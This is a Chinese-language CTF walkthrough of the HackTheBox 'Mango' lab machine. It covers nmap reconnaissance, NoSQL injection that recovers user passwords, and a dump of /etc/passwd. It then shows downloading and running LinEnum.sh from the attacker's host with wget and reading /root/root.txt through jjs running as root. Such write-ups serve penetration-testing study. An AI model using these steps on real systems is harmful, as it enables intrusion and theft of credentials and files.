Hack the box - Mango

admin 2022年3月26日08:11:18评论40 views字数 4450阅读14分50秒阅读模式

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

摘要

            · nosql 注入

            · jjs 文件读取


信息收集

               nmap扫出了 22 , 80 , 443 端口


root@localhost:~# nmap -sC -sV -p 80,22,443 10.10.10.162Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:53 CSTNmap scan report for bogon (10.10.10.162)Host is up (0.44s latency).
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: 403 Forbidden443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: Mango | Search Base| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN| Not valid before: 2019-09-27T14:21:19|_Not valid after: 2020-09-26T14:21:19|_ssl-date: TLS randomness does not represent time| tls-alpn: |_ http/1.1Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds


        

80端口的web并没有什么发现访问443,https的 web 弹出证书提示点击错误代码提示,发现证书


Hack the box - Mango


证书解密

发现新站点 staging-order.mango.htb


Hack the box - Mango

Hack the box - Mango



Nosql 注入


                发现登录框mango-nosql注入


root@localhost:~/hackthebox_workspace/finish/Mango#./brute.pyhh3h3mh3mXh3mXKh3mXK8h3mXK8Rh3mXK8Rhh3mXK8RhUh3mXK8RhU~h3mXK8RhU~fh3mXK8RhU~f{h3mXK8RhU~f{]h3mXK8RhU~f{]fh3mXK8RhU~f{]f5h3mXK8RhU~f{]f5HMango password: h3mXK8RhU~f{]f5H




拿到密码后 ssh 登录,当前权限找不到user.txt,查看 passwd 发现 admin 用户


mango@mango:~$ cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologinsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologinsyslog:x:102:106::/home/syslog:/usr/sbin/nologinmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin_apt:x:104:65534::/nonexistent:/usr/sbin/nologinlxd:x:105:65534::/var/lib/lxd/:/bin/falseuuidd:x:106:110::/run/uuidd:/usr/sbin/nologindnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologinpollinate:x:109:1::/var/cache/pollinate:/bin/falsesshd:x:110:65534::/run/sshd:/usr/sbin/nologinmango:x:1000:1000:mango:/home/mango:/bin/bashadmin:x:4000000000:1001:,,,:/home/admin/:/bin/shmongodb:x:111:65534::/home/mongodb:/usr/sbin/nologin


nosql 注入获取 admin 账号


root@localhost:~/hackthebox_workspace/finish/Mango#./brute.pytt9t9Kt9Kct9KcSt9KcS3t9KcS3>t9KcS3>!t9KcS3>!0t9KcS3>!0Bt9KcS3>!0B#t9KcS3>!0B#2Admin password: t9KcS3>!0B#2


切换到 admin 账号,获取user.txt,利用python 和 wget 传输枚举脚本


kali:root@localhost:~/hackthebox_workspace# python -m SimpleHTTPServer 80
HTB server:admin@mango:/tmp$ wget http://10.10.xx.xx/LinEnum.shadmin@mango:/tmp$ chmod +x LinEnum.shadmin@mango:/tmp$ ./LinEnum.sh


发现了可以用 jjs(java嵌入式javascript引擎脚本工具https://www.runoob.com/java/java8-nashorn-javascript.html root 权限运行

https://gtfobins.github.io/gtfobins/jjs/#file-read


root       1993  0.0  4.0 2577268 82144 pts/1   Tl   05:55   0:02 jjs 
admin@mango:/home/mango$ jjsWarning: The jjs tool is planned to be removed from a future JDK releasejjs> var BufferedReader = Java.type("java.io.BufferedReader");jjs> var FileReader = Java.type("java.io.FileReader");jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));jjs> while ((line = br.readLine()) != null) { print(line); }8a******************************





手握日月摘星辰,安全路上永不止步。

                                                   - Khan攻防安全实验室



本文始发于微信公众号(Khan安全攻防实验室):Hack the box - Mango

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月26日08:11:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hack the box - Mangohttps://cn-sec.com/archives/536408.html

发表评论

匿名网友 填写信息